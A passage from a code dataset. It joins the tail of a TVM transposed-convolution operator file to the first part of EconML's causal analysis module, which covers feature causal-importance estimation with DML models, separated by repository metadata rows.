and opad_w:{opad_w} < stride_w:{stride_w} does not satisfy."
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_channels, filter_h, filter_w),
lambda i, o, h, w: kernel[o][i][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
batch, in_channels, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_channels = simplify(out_c * groups)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_channels // groups), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
# data: batch, in_channels, out_h, out_w
# weight: out_channels // G, in_channels, out_h, out_w
return te.compute(
(batch, out_channels, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[
b, c // (out_channels // groups) * (in_channels // groups) + dc, h + dh, w + dw
].astype(out_dtype)
* kernel_transform[
c % (out_channels // groups),
c // (out_channels // groups) * (in_channels // groups) + dc,
dh,
dw,
].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="group_conv2d_transpose_nchw",
)
def layout_transform(tensor: "relay.Expr", current_layout: str, desired_layout: str):
"""Transform a tensor with the current layout to the desired layout.
E.g. layout_transform(t, "NCHW", "CNHW") --> relay.transpose(t, [1, 0, 2, 3])
Parameters
----------
tensor: relay.Expr
The Tensor to transpose
current_layout: str
The current layout e.g. NCHW or OIHW
desired_layout: str
The desired layout, must be compatible with current_layout
Returns
-------
The layout_transformed tensor.
"""
if sorted(current_layout) != sorted(desired_layout):
raise ValueError(f"Incompatible layouts: {current_layout} vs {desired_layout}")
if current_layout == desired_layout:
return tensor
current_layout_map = {c: i for i, c in enumerate(current_layout)}
desired_layout_map = {c: i for i, c in enumerate(desired_layout)}
axes = [None] * len(current_layout)
for c, i in desired_layout_map.items():
axes[i] = current_layout_map[c]
return relay.transpose(tensor, axes=axes)
@tvm.target.generic_func
def conv2d_transpose_legalize(attrs, inputs, types):
"""Legalizes Transposed 2D convolution op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed 2D convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
data, kernel = inputs
kernel_layout = attrs["kernel_layout"]
if attrs["data_layout"] == "NHWC":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
# Set new attrs for conv2d_transpose.
new_attrs = {k: attrs[k] for k in attrs.keys()}
new_attrs["data_layout"] = "NCHW"
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
# Convert data to NCHW.
data = relay.transpose(data, axes=(0, 3, 1, 2))
deconv = relay.nn.conv2d_transpose(data, kernel, **new_attrs)
# Convert back to original NHWC layout.
out = relay.transpose(deconv, axes=(0, 2, 3, 1))
return out
if attrs["data_layout"] == "NCHW":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
new_attrs = {k: attrs[k] for k in attrs.keys()}
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
return relay.nn.conv2d_transpose(data, kernel, **new_attrs)
return None
| 34.329268
| 99
| 0.653819
| 0
| 0
| 0
| 0
| 1,580
| 0.14032
| 0
| 0
| 5,060
| 0.449378
|
c40810867a32dd051fe382d63b22b8bac17db49f
| 91,964
|
py
|
Python
|
econml/solutions/causal_analysis/_causal_analysis.py
|
huigangchen/EconML
|
9a56d651e2964ebd05144de52f577f9044a22a0b
|
[
"BSD-3-Clause"
] | 1,846
|
2019-05-06T21:14:19.000Z
|
2022-03-31T11:52:21.000Z
|
econml/solutions/causal_analysis/_causal_analysis.py
|
cleeway/EconML
|
fb2d1139f6c271d4b9a24d9c6d122d4d0891afb0
|
[
"BSD-3-Clause"
] | 393
|
2019-05-08T00:55:32.000Z
|
2022-03-31T14:26:16.000Z
|
econml/solutions/causal_analysis/_causal_analysis.py
|
cleeway/EconML
|
fb2d1139f6c271d4b9a24d9c6d122d4d0891afb0
|
[
"BSD-3-Clause"
] | 414
|
2019-05-14T03:51:08.000Z
|
2022-03-31T09:32:17.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Module for assessing causal feature importance."""
import warnings
from collections import OrderedDict, namedtuple
import joblib
import lightgbm as lgb
from numba.core.utils import erase_traceback
import numpy as np
from numpy.lib.function_base import iterable
import pandas as pd
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.compose import ColumnTransformer
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier, RandomForestRegressor
from sklearn.linear_model import Lasso, LassoCV, LogisticRegression, LogisticRegressionCV
from sklearn.pipeline import make_pipeline, Pipeline
from sklearn.preprocessing import OneHotEncoder, PolynomialFeatures, StandardScaler
from sklearn.tree import _tree
from sklearn.utils.validation import column_or_1d
from ...cate_interpreter import SingleTreeCateInterpreter, SingleTreePolicyInterpreter
from ...dml import LinearDML, CausalForestDML
from ...inference import NormalInferenceResults
from ...sklearn_extensions.linear_model import WeightedLasso
from ...sklearn_extensions.model_selection import GridSearchCVList
from ...utilities import _RegressionWrapper, inverse_onehot
# TODO: this utility is documented but internal; reimplement?
from sklearn.utils import _safe_indexing
# TODO: this utility is even less public...
from sklearn.utils import _get_column_indices
class _CausalInsightsConstants:
RawFeatureNameKey = 'raw_name'
EngineeredNameKey = 'name'
CategoricalColumnKey = 'cat'
TypeKey = 'type'
PointEstimateKey = 'point'
StandardErrorKey = 'stderr'
ZStatKey = 'zstat'
ConfidenceIntervalLowerKey = 'ci_lower'
ConfidenceIntervalUpperKey = 'ci_upper'
PValueKey = 'p_value'
Version = 'version'
CausalComputationTypeKey = 'causal_computation_type'
ConfoundingIntervalKey = 'confounding_interval'
ViewKey = 'view'
InitArgsKey = 'init_args'
RowData = 'row_data' # NOTE: RowData is mutually exclusive with the other data columns
ALL = [RawFeatureNameKey,
EngineeredNameKey,
CategoricalColumnKey,
TypeKey,
PointEstimateKey,
StandardErrorKey,
ZStatKey,
ConfidenceIntervalLowerKey,
ConfidenceIntervalUpperKey,
PValueKey,
Version,
CausalComputationTypeKey,
ConfoundingIntervalKey,
ViewKey,
InitArgsKey,
RowData]
def _get_default_shared_insights_output():
"""
Dictionary elements shared among all analyses.
In case of breaking changes to this dictionary output, the major version of this
dictionary should be updated. In case of a change to this dictionary, the minor
version should be updated.
"""
return {
_CausalInsightsConstants.RawFeatureNameKey: [],
_CausalInsightsConstants.EngineeredNameKey: [],
_CausalInsightsConstants.CategoricalColumnKey: [],
_CausalInsightsConstants.TypeKey: [],
_CausalInsightsConstants.Version: '1.0',
_CausalInsightsConstants.CausalComputationTypeKey: "simple",
_CausalInsightsConstants.ConfoundingIntervalKey: None,
_CausalInsightsConstants.InitArgsKey: {}
}
def _get_default_specific_insights(view):
# keys should be mutually exclusive with shared keys, so that the dictionaries can be cleanly merged
return {
_CausalInsightsConstants.PointEstimateKey: [],
_CausalInsightsConstants.StandardErrorKey: [],
_CausalInsightsConstants.ZStatKey: [],
_CausalInsightsConstants.ConfidenceIntervalLowerKey: [],
_CausalInsightsConstants.ConfidenceIntervalUpperKey: [],
_CausalInsightsConstants.PValueKey: [],
_CausalInsightsConstants.ViewKey: view
}
def _get_metadata_causal_insights_keys():
return [_CausalInsightsConstants.Version,
_CausalInsightsConstants.CausalComputationTypeKey,
_CausalInsightsConstants.ConfoundingIntervalKey,
_CausalInsightsConstants.ViewKey]
def _get_column_causal_insights_keys():
return [_CausalInsightsConstants.RawFeatureNameKey,
_CausalInsightsConstants.EngineeredNameKey,
_CausalInsightsConstants.CategoricalColumnKey,
_CausalInsightsConstants.TypeKey]
def _get_data_causal_insights_keys():
return [_CausalInsightsConstants.PointEstimateKey,
_CausalInsightsConstants.StandardErrorKey,
_CausalInsightsConstants.ZStatKey,
_CausalInsightsConstants.ConfidenceIntervalLowerKey,
_CausalInsightsConstants.ConfidenceIntervalUpperKey,
_CausalInsightsConstants.PValueKey]
def _first_stage_reg(X, y, *, automl=True, random_state=None, verbose=0):
if automl:
model = GridSearchCVList([LassoCV(random_state=random_state),
RandomForestRegressor(
n_estimators=100, random_state=random_state, min_samples_leaf=10),
lgb.LGBMRegressor(num_leaves=32, random_state=random_state)],
param_grid_list=[{},
{'min_weight_fraction_leaf':
[.001, .01, .1]},
{'learning_rate': [0.1, 0.3], 'max_depth': [3, 5]}],
cv=3,
scoring='r2',
verbose=verbose)
best_est = model.fit(X, y).best_estimator_
if isinstance(best_est, LassoCV):
return Lasso(alpha=best_est.alpha_, random_state=random_state)
else:
return best_est
else:
model = LassoCV(cv=5, random_state=random_state).fit(X, y)
return Lasso(alpha=model.alpha_, random_state=random_state)
def _first_stage_clf(X, y, *, make_regressor=False, automl=True, min_count=None, random_state=None, verbose=0):
# use same Cs as would be used by default by LogisticRegressionCV
cs = np.logspace(-4, 4, 10)
if min_count is None:
min_count = _CAT_LIMIT # we have at least this many instances
if automl:
# NOTE: we don't use LogisticRegressionCV inside the grid search because of the nested stratification
# which could affect how many times each distinct Y value needs to be present in the data
model = GridSearchCVList([LogisticRegression(max_iter=1000,
random_state=random_state),
RandomForestClassifier(n_estimators=100, min_samples_leaf=10,
random_state=random_state),
lgb.LGBMClassifier(num_leaves=32, random_state=random_state)],
param_grid_list=[{'C': cs},
{'max_depth': [3, None],
'min_weight_fraction_leaf': [.001, .01, .1]},
{'learning_rate': [0.1, 0.3], 'max_depth': [3, 5]}],
cv=min(3, min_count),
scoring='neg_log_loss',
verbose=verbose)
est = model.fit(X, y).best_estimator_
else:
model = LogisticRegressionCV(
cv=min(5, min_count), max_iter=1000, Cs=cs, random_state=random_state).fit(X, y)
est = LogisticRegression(C=model.C_[0], max_iter=1000, random_state=random_state)
if make_regressor:
return _RegressionWrapper(est)
else:
return est
def _final_stage(*, random_state=None, verbose=0):
return GridSearchCVList([WeightedLasso(random_state=random_state),
RandomForestRegressor(n_estimators=100, random_state=random_state, verbose=verbose)],
param_grid_list=[{'alpha': [.001, .01, .1, 1, 10]},
{'max_depth': [3, 5],
'min_samples_leaf': [10, 50]}],
cv=3,
scoring='neg_mean_squared_error',
verbose=verbose)
# simplification of sklearn's ColumnTransformer that encodes categoricals and passes through selected other columns
# but also supports get_feature_names with expected signature
class _ColumnTransformer(TransformerMixin):
def __init__(self, categorical, passthrough):
self.categorical = categorical
self.passthrough = passthrough
def fit(self, X):
cat_cols = _safe_indexing(X, self.categorical, axis=1)
if cat_cols.shape[1] > 0:
self.has_cats = True
# NOTE: set handle_unknown to 'ignore' so that we don't throw at runtime if given a novel value
self.one_hot_encoder = OneHotEncoder(sparse=False,
handle_unknown='ignore').fit(cat_cols)
else:
self.has_cats = False
self.d_x = X.shape[1]
return self
def transform(self, X):
rest = _safe_indexing(X, self.passthrough, axis=1)
if self.has_cats:
cats = self.one_hot_encoder.transform(_safe_indexing(X, self.categorical, axis=1))
# NOTE: we rely on the passthrough columns coming first in the concatenated X;W
# when we pipeline scaling with our first stage models later, so the order here is important
return np.hstack((rest, cats))
else:
return rest
def get_feature_names(self, names=None):
if names is None:
names = [f"x{i}" for i in range(self.d_x)]
rest = _safe_indexing(names, self.passthrough, axis=0)
if self.has_cats:
cats = self.one_hot_encoder.get_feature_names(
_safe_indexing(names, self.categorical, axis=0))
return np.concatenate((rest, cats))
else:
return rest
# Wrapper to make sure that we get a deep copy of the contents instead of clone returning an untrained copy
class _Wrapper:
def __init__(self, item):
self.item = item
class _FrozenTransformer(TransformerMixin, BaseEstimator):
def __init__(self, wrapper):
self.wrapper = wrapper
def fit(self, X, y):
return self
def transform(self, X):
return self.wrapper.item.transform(X)
def _freeze(transformer):
return _FrozenTransformer(_Wrapper(transformer))
# Convert python objects to (possibly nested) types that can easily be represented as literals
def _sanitize(obj):
if obj is None or isinstance(obj, (bool, int, str, float)):
return obj
elif isinstance(obj, dict):
return {_sanitize(key): _sanitize(obj[key]) for key in obj}
else:
try:
return [_sanitize(item) for item in obj]
except Exception:
raise ValueError(f"Could not sanitize input {obj}")
# Convert SingleTreeInterpreter to a python dictionary
def _tree_interpreter_to_dict(interp, features, leaf_data=lambda t, n: {}):
tree = interp.tree_model_.tree_
node_dict = interp.node_dict_
def recurse(node_id):
if tree.children_left[node_id] == _tree.TREE_LEAF:
return {'leaf': True, 'n_samples': tree.n_node_samples[node_id], **leaf_data(tree, node_id, node_dict)}
else:
return {'leaf': False, 'feature': features[tree.feature[node_id]], 'threshold': tree.threshold[node_id],
'left': recurse(tree.children_left[node_id]),
'right': recurse(tree.children_right[node_id])}
return recurse(0)
class _PolicyOutput:
"""
A type encapsulating various information related to a learned policy.
Attributes
----------
tree_dictionary:dict
The policy tree represented as a dictionary,
policy_value:float
The average value of applying the recommended policy (over using the control),
always_treat:dict of string to float
A dictionary mapping each non-control treatment to the value of always treating with it (over control),
control_name:string
The name of the control treatment
"""
def __init__(self, tree_dictionary, policy_value, always_treat, control_name):
self.tree_dictionary = tree_dictionary
self.policy_value = policy_value
self.always_treat = always_treat
self.control_name = control_name
# named tuple type for storing results inside CausalAnalysis class;
# must be lifted to module level to enable pickling
_result = namedtuple("_result", field_names=[
"feature_index", "feature_name", "feature_baseline", "feature_levels", "hinds",
"X_transformer", "W_transformer", "estimator", "global_inference", "treatment_value"])
def _process_feature(name, feat_ind, verbose, categorical_inds, categories, heterogeneity_inds, min_counts, y, X,
nuisance_models, h_model, random_state, model_y, cv, mc_iters):
try:
if verbose > 0:
print(f"CausalAnalysis: Feature {name}")
discrete_treatment = feat_ind in categorical_inds
if discrete_treatment:
cats = categories[categorical_inds.index(feat_ind)]
else:
cats = 'auto' # just leave the setting at the default otherwise
# the transformation logic here is somewhat tricky; we always need to encode the categorical columns,
# whether they end up in X or in W. However, for the continuous columns, we want to scale them all
# when running the first stage models, but don't want to scale the X columns when running the final model,
# since then our coefficients will have odd units and our trees will also have decisions using those units.
#
# we achieve this by pipelining the X scaling with the Y and T models (with fixed scaling, not refitting)
hinds = heterogeneity_inds[feat_ind]
WX_transformer = ColumnTransformer([('encode', OneHotEncoder(drop='first', sparse=False),
[ind for ind in categorical_inds
if ind != feat_ind]),
('drop', 'drop', feat_ind)],
remainder=StandardScaler())
W_transformer = ColumnTransformer([('encode', OneHotEncoder(drop='first', sparse=False),
[ind for ind in categorical_inds
if ind != feat_ind and ind not in hinds]),
('drop', 'drop', hinds),
('drop_feat', 'drop', feat_ind)],
remainder=StandardScaler())
X_cont_inds = [ind for ind in hinds
if ind != feat_ind and ind not in categorical_inds]
# Use _ColumnTransformer instead of ColumnTransformer so we can get feature names
X_transformer = _ColumnTransformer([ind for ind in categorical_inds
if ind != feat_ind and ind in hinds],
X_cont_inds)
# Controls are all other columns of X
WX = WX_transformer.fit_transform(X)
# can't use X[:, feat_ind] when X is a DataFrame
T = _safe_indexing(X, feat_ind, axis=1)
# TODO: we can't currently handle unseen values of the feature column when getting the effect;
# we might want to modify OrthoLearner (and other discrete treatment classes)
# so that the user can opt-in to allowing unseen treatment values
# (and return NaN or something in that case)
W = W_transformer.fit_transform(X)
X_xf = X_transformer.fit_transform(X)
# HACK: this is slightly ugly because we rely on the fact that DML passes [X;W] to the first stage models
# and so we can just peel the first columns off of that combined array for rescaling in the pipeline
# TODO: consider addding an API to DML that allows for better understanding of how the nuisance inputs are
# built, such as model_y_feature_names, model_t_feature_names, model_y_transformer, etc., so that this
# becomes a valid approach to handling this
X_scaler = ColumnTransformer([('scale', StandardScaler(),
list(range(len(X_cont_inds))))],
remainder='passthrough').fit(np.hstack([X_xf, W])).named_transformers_['scale']
X_scaler_fixed = ColumnTransformer([('scale', _freeze(X_scaler),
list(range(len(X_cont_inds))))],
remainder='passthrough')
if W.shape[1] == 0:
# array checking routines don't accept 0-width arrays
W = None
if X_xf.shape[1] == 0:
X_xf = None
if verbose > 0:
print("CausalAnalysis: performing model selection on T model")
# perform model selection
model_t = (_first_stage_clf(WX, T, automl=nuisance_models == 'automl',
min_count=min_counts.get(feat_ind, None),
random_state=random_state, verbose=verbose)
if discrete_treatment else _first_stage_reg(WX, T, automl=nuisance_models == 'automl',
random_state=random_state,
verbose=verbose))
pipelined_model_t = Pipeline([('scale', X_scaler_fixed),
('model', model_t)])
pipelined_model_y = Pipeline([('scale', X_scaler_fixed),
('model', model_y)])
if X_xf is None and h_model == 'forest':
warnings.warn(f"Using a linear model instead of a forest model for feature '{name}' "
"because forests don't support models with no heterogeneity indices")
h_model = 'linear'
if h_model == 'linear':
est = LinearDML(model_y=pipelined_model_y,
model_t=pipelined_model_t,
discrete_treatment=discrete_treatment,
fit_cate_intercept=True,
linear_first_stages=False,
categories=cats,
random_state=random_state,
cv=cv,
mc_iters=mc_iters)
elif h_model == 'forest':
est = CausalForestDML(model_y=pipelined_model_y,
model_t=pipelined_model_t,
discrete_treatment=discrete_treatment,
n_estimators=4000,
min_var_leaf_on_val=True,
categories=cats,
random_state=random_state,
verbose=verbose,
cv=cv,
mc_iters=mc_iters)
if verbose > 0:
print("CausalAnalysis: tuning forest")
est.tune(y, T, X=X_xf, W=W)
if verbose > 0:
print("CausalAnalysis: training causal model")
est.fit(y, T, X=X_xf, W=W, cache_values=True)
# Prefer ate__inference to const_marginal_ate_inference(X) because it is doubly-robust and not conservative
if h_model == 'forest' and discrete_treatment:
global_inference = est.ate__inference()
else:
# convert to NormalInferenceResults for consistency
inf = est.const_marginal_ate_inference(X=X_xf)
global_inference = NormalInferenceResults(d_t=inf.d_t, d_y=inf.d_y,
pred=inf.mean_point,
pred_stderr=inf.stderr_mean,
mean_pred_stderr=None,
inf_type='ate')
# Set the dictionary values shared between local and global summaries
if discrete_treatment:
cats = est.transformer.categories_[0]
baseline = cats[est.transformer.drop_idx_[0]]
cats = cats[np.setdiff1d(np.arange(len(cats)),
est.transformer.drop_idx_[0])]
d_t = len(cats)
insights = {
_CausalInsightsConstants.TypeKey: ['cat'] * d_t,
_CausalInsightsConstants.RawFeatureNameKey: [name] * d_t,
_CausalInsightsConstants.CategoricalColumnKey: cats.tolist(),
_CausalInsightsConstants.EngineeredNameKey: [
f"{name} (base={baseline}): {c}" for c in cats]
}
treatment_value = 1
else:
d_t = 1
cats = ["num"]
baseline = None
insights = {
_CausalInsightsConstants.TypeKey: ["num"],
_CausalInsightsConstants.RawFeatureNameKey: [name],
_CausalInsightsConstants.CategoricalColumnKey: [name],
_CausalInsightsConstants.EngineeredNameKey: [name]
}
# calculate a "typical" treatment value, using the mean of the absolute value of non-zero treatments
treatment_value = np.mean(np.abs(T[T != 0]))
result = _result(feature_index=feat_ind,
feature_name=name,
feature_baseline=baseline,
feature_levels=cats,
hinds=hinds,
X_transformer=X_transformer,
W_transformer=W_transformer,
estimator=est,
global_inference=global_inference,
treatment_value=treatment_value)
return insights, result
except Exception as e:
return e
# Unless we're opting into minimal cross-fitting, this is the minimum number of instances of each category
# required to fit a discrete DML model
_CAT_LIMIT = 10
class CausalAnalysis:
"""
Note: this class is experimental and the API may evolve over our next few releases.
Gets causal importance of features.
Parameters
----------
feature_inds: array-like of int, str, or bool
The features for which to estimate causal effects, expressed as either column indices,
column names, or boolean flags indicating which columns to pick
categorical: array-like of int, str, or bool
The features which are categorical in nature, expressed as either column indices,
column names, or boolean flags indicating which columns to pick
heterogeneity_inds: array-like of int, str, or bool, or None or list of array-like elements or None, default None
If a 1d array, then whenever estimating a heterogeneous (local) treatment effect
model, then only the features in this array will be used for heterogeneity. If a 2d
array then its first dimension should be len(feature_inds) and whenever estimating
a local causal effect for target feature feature_inds[i], then only features in
heterogeneity_inds[i] will be used for heterogeneity. If heterogeneity_inds[i]=None, then all features
are used for heterogeneity when estimating local causal effect for feature_inds[i], and likewise if
heterogeneity_inds[i]=[] then no features will be used for heterogeneity. If heterogeneity_ind=None
then all features are used for heterogeneity for all features, and if heterogeneity_inds=[] then
no features will be.
feature_names: list of str, default None
The names for all of the features in the data. Not necessary if the input will be a dataframe.
If None and the input is a plain numpy array, generated feature names will be ['X1', 'X2', ...].
upper_bound_on_cat_expansion: int, default 5
The maximum number of categorical values allowed, because they are expanded via one-hot encoding. If a
feature has more than this many values, then a causal effect model is not fitted for that target feature
and a warning flag is raised. The remainder of the models are fitted.
classification: bool, default False
Whether this is a classification (as opposed to regression) task
TODO. Enable also multi-class classification (post-MVP)
nuisance_models: one of {'linear', 'automl'}, optional (default='linear')
What models to use for nuisance estimation (i.e. for estimating propensity models or models of how
controls predict the outcome). If 'linear', then LassoCV (for regression) and LogisticRegressionCV
(for classification) are used. If 'automl', then a kfold cross-validation and model selection is performed
among several models and the best is chosen.
TODO. Add other options, such as {'azure_automl', 'forests', 'boosting'} that will use particular sub-cases
of models or also integrate with azure autoML. (post-MVP)
heterogeneity_model: one of {'linear', 'forest'}, optional (default='linear')
What type of model to use for treatment effect heterogeneity. 'linear' means that a heterogeneity model
of the form theta(X)=<a, X> will be used, while 'forest' means that a forest model will be trained instead.
TODO. Add other options, such as {'automl'} for performing
model selection for the causal effect, or {'sparse_linear'} for using a debiased lasso. (post-MVP)
categories: 'auto' or list of ('auto' or list of values), default 'auto'
What categories to use for the categorical columns. If 'auto', then the categories will be inferred for
all categorical columns; otherwise this argument should have as many entries as there are categorical columns,
and each entry should be either 'auto' to infer the values for that column or the list of values for the
column. If explicit values are provided, the first value is treated as the "control" value for that column
against which other values are compared.
n_jobs: int, default -1
Degree of parallelism to use when training models via joblib.Parallel
verbose : int, default=0
Controls the verbosity when fitting and predicting.
cv: int, cross-validation generator or an iterable, default 5
Determines the strategy for cross-fitting used when training causal models for each feature.
Possible inputs for cv are:
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
mc_iters: int, default 3
The number of times to rerun the first stage models to reduce the variance of the causal model nuisances.
skip_cat_limit_checks: bool, default False
By default, categorical features need to have several instances of each category in order for a model to be
fit robustly. Setting this to True will skip these checks (although at least 2 instances will always be
required for linear heterogeneity models, and 4 for forest heterogeneity models even in that case).
random_state : int, RandomState instance or None, default=None
Controls the randomness of the estimator. The features are always
randomly permuted at each split. When ``max_features < n_features``, the algorithm will
select ``max_features`` at random at each split before finding the best
split among them. But the best found split may vary across different
runs, even if ``max_features=n_features``. That is the case, if the
improvement of the criterion is identical for several splits and one
split has to be selected at random. To obtain a deterministic behaviour
during fitting, ``random_state`` has to be fixed to an integer.
Attributes
----------
nuisance_models_: string
The nuisance models setting used for the most recent call to fit
heterogeneity_model: string
The heterogeneity model setting used for the most recent call to fit
feature_names_: list of string
The list of feature names from the data in the most recent call to fit
trained_feature_indices_: list of int
The list of feature indices where models were trained successfully
untrained_feature_indices_: list of tuple of (int, string or Exception)
The list of indices that were requested but not able to be trained succesfully,
along with either a reason or caught Exception for each
"""
def __init__(self, feature_inds, categorical, heterogeneity_inds=None, feature_names=None, classification=False,
upper_bound_on_cat_expansion=5, nuisance_models='linear', heterogeneity_model='linear', *,
categories='auto', n_jobs=-1, verbose=0, cv=5, mc_iters=3, skip_cat_limit_checks=False,
random_state=None):
self.feature_inds = feature_inds
self.categorical = categorical
self.heterogeneity_inds = heterogeneity_inds
self.feature_names = feature_names
self.classification = classification
self.upper_bound_on_cat_expansion = upper_bound_on_cat_expansion
self.nuisance_models = nuisance_models
self.heterogeneity_model = heterogeneity_model
self.categories = categories
self.n_jobs = n_jobs
self.verbose = verbose
self.cv = cv
self.mc_iters = mc_iters
self.skip_cat_limit_checks = skip_cat_limit_checks
self.random_state = random_state
def fit(self, X, y, warm_start=False):
"""
Fits global and local causal effect models for each feature in feature_inds on the data
Parameters
----------
X : array-like
Feature data
y : array-like of shape (n,) or (n,1)
Outcome. If classification=True, then y should take two values. Otherwise an error is raised
that only binary classification is implemented for now.
TODO. enable multi-class classification for y (post-MVP)
warm_start : boolean, default False
If False, train models for each feature in `feature_inds`.
If True, train only models for features in `feature_inds` that had not already been trained by
the previous call to `fit`, and for which neither the corresponding heterogeneity_inds, nor the
automl flag have changed. If heterogeneity_inds have changed, then the final stage model of these features
will be refit. If the automl flag has changed, then whole model is refit, despite the warm start flag.
"""
# Validate inputs
assert self.nuisance_models in ['automl', 'linear'], (
"The only supported nuisance models are 'linear' and 'automl', "
f"but was given {self.nuisance_models}")
assert self.heterogeneity_model in ['linear', 'forest'], (
"The only supported heterogeneity models are 'linear' and 'forest' but received "
f"{self.heterogeneity_model}")
assert np.ndim(X) == 2, f"X must be a 2-dimensional array, but here had shape {np.shape(X)}"
assert iterable(self.feature_inds), f"feature_inds should be array-like, but got {self.feature_inds}"
assert iterable(self.categorical), f"categorical should be array-like, but got {self.categorical}"
assert self.heterogeneity_inds is None or iterable(self.heterogeneity_inds), (
f"heterogeneity_inds should be None or array-like, but got {self.heterogeneity_inds}")
assert self.feature_names is None or iterable(self.feature_names), (
f"feature_names should be None or array-like, but got {self.feature_names}")
assert self.categories == 'auto' or iterable(self.categories), (
f"categories should be 'auto' or array-like, but got {self.categories}")
# TODO: check compatibility of X and Y lengths
if warm_start:
if not hasattr(self, "_results"):
# no previous fit, cancel warm start
warm_start = False
elif self._d_x != X.shape[1]:
raise ValueError(
f"Can't warm start: previous X had {self._d_x} columns, new X has {X.shape[1]} columns")
# work with numeric feature indices, so that we can easily compare with categorical ones
train_inds = _get_column_indices(X, self.feature_inds)
if len(train_inds) == 0:
raise ValueError(
"No features specified. At least one feature index must be specified so that a model can be trained.")
heterogeneity_inds = self.heterogeneity_inds
if heterogeneity_inds is None:
heterogeneity_inds = [None for ind in train_inds]
# if heterogeneity_inds is 1D, repeat it
if heterogeneity_inds == [] or isinstance(heterogeneity_inds[0], (int, str, bool)):
heterogeneity_inds = [heterogeneity_inds for _ in train_inds]
# heterogeneity inds should be a 2D list of length same as train_inds
elif heterogeneity_inds is not None and len(heterogeneity_inds) != len(train_inds):
raise ValueError("Heterogeneity indexes should have the same number of entries, but here "
f" there were {len(heterogeneity_inds)} heterogeneity entries but "
f" {len(train_inds)} feature indices.")
# replace None elements of heterogeneity_inds and ensure indices are numeric
heterogeneity_inds = {ind: list(range(X.shape[1])) if hinds is None else _get_column_indices(X, hinds)
for ind, hinds in zip(train_inds, heterogeneity_inds)}
if warm_start:
train_y_model = False
if self.nuisance_models != self.nuisance_models_:
warnings.warn("warm_start will be ignored since the nuisance models have changed "
f"from {self.nuisance_models_} to {self.nuisance_models} since the previous call to fit")
warm_start = False
train_y_model = True
if self.heterogeneity_model != self.heterogeneity_model_:
warnings.warn("warm_start will be ignored since the heterogeneity model has changed "
f"from {self.heterogeneity_model_} to {self.heterogeneity_model} "
"since the previous call to fit")
warm_start = False
# TODO: bail out also if categorical columns, classification, random_state changed?
else:
train_y_model = True
# TODO: should we also train a new model_y under any circumstances when warm_start is True?
if warm_start:
new_inds = [ind for ind in train_inds if (ind not in self._cache or
heterogeneity_inds[ind] != self._cache[ind][1].hinds)]
else:
new_inds = list(train_inds)
self._cache = {} # store mapping from feature to insights, results
# train the Y model
if train_y_model:
# perform model selection for the Y model using all X, not on a per-column basis
allX = ColumnTransformer([('encode',
OneHotEncoder(
drop='first', sparse=False),
self.categorical)],
remainder=StandardScaler()).fit_transform(X)
if self.verbose > 0:
print("CausalAnalysis: performing model selection on overall Y model")
if self.classification:
self._model_y = _first_stage_clf(allX, y, automl=self.nuisance_models == 'automl',
make_regressor=True,
random_state=self.random_state, verbose=self.verbose)
else:
self._model_y = _first_stage_reg(allX, y, automl=self.nuisance_models == 'automl',
random_state=self.random_state, verbose=self.verbose)
if self.classification:
# now that we've trained the classifier and wrapped it, ensure that y is transformed to
# work with the regression wrapper
# we use column_or_1d to treat pd.Series and pd.DataFrame objects the same way as arrays
y = column_or_1d(y).reshape(-1, 1)
# note that this needs to happen after wrapping to generalize to the multi-class case,
# since otherwise we'll have too many columns to be able to train a classifier
y = OneHotEncoder(drop='first', sparse=False).fit_transform(y)
assert y.ndim == 1 or y.shape[1] == 1, ("Multiclass classification isn't supported" if self.classification
else "Only a single outcome is supported")
self._vec_y = y.ndim == 1
self._d_x = X.shape[1]
# start with empty results and default shared insights
self._results = []
self._shared = _get_default_shared_insights_output()
self._shared[_CausalInsightsConstants.InitArgsKey] = {
'feature_inds': _sanitize(self.feature_inds),
'categorical': _sanitize(self.categorical),
'heterogeneity_inds': _sanitize(self.heterogeneity_inds),
'feature_names': _sanitize(self.feature_names),
'classification': _sanitize(self.classification),
'upper_bound_on_cat_expansion': _sanitize(self.upper_bound_on_cat_expansion),
'nuisance_models': _sanitize(self.nuisance_models),
'heterogeneity_model': _sanitize(self.heterogeneity_model),
'categories': _sanitize(self.categories),
'n_jobs': _sanitize(self.n_jobs),
'verbose': _sanitize(self.verbose),
'random_state': _sanitize(self.random_state)
}
# convert categorical indicators to numeric indices
categorical_inds = _get_column_indices(X, self.categorical)
categories = self.categories
if categories == 'auto':
categories = ['auto' for _ in categorical_inds]
else:
assert len(categories) == len(categorical_inds), (
"If categories is not 'auto', it must contain one entry per categorical column. Instead, categories"
